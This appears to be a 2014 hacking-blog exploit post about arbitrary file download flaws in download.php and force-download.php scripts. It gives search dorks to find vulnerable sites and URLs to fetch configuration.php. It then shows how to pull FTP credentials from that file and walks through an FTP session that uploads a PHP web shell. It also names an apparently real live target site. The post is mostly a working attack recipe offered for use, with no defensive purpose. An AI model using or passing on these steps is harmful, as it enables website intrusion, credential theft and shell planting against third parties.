- Date: 25/07/2014
- Tested on : Windows
Dork:
inurl:/download.php?file=
inurl:/force-download.php?file=
Explorer ur brain
Get Database :
ww.site.com/download.php?file=configuration.php
ww.site.com/force-download.php?file=configuration.php
Find FTP User And FTP Password On Database :
var $Ftp_User : 'user'
var $Ftp_pass : 'user'
var $Ftp_root : 'public_html'
Upload Shell via FTP CMD
1. Open CMD
Example :
C:\Documents and Settings\USER> ftp site.com
to www.site.com
Connected to site.com
username : user
331 Password Required for example
Password : password
user Loged in
ftp> ls
public_html ( view var $ftp_root ) --> If var $ftp_root : 'public_html' ( cd public_html )
ftp>cd public_html
ftp> put "C:\CoderSec.php" << shell
Command Success
File Transfered
Shell Access :
www.site.com/CoderSec.php
Live Target :
http://hisardoot.co.il/ISD/knife%20..%20configuration.php
Ex : http://www8.0zz0.com/2014/07/25/09/326538625.jpg
This comment has been removed by a blog administrator.
ReplyDelete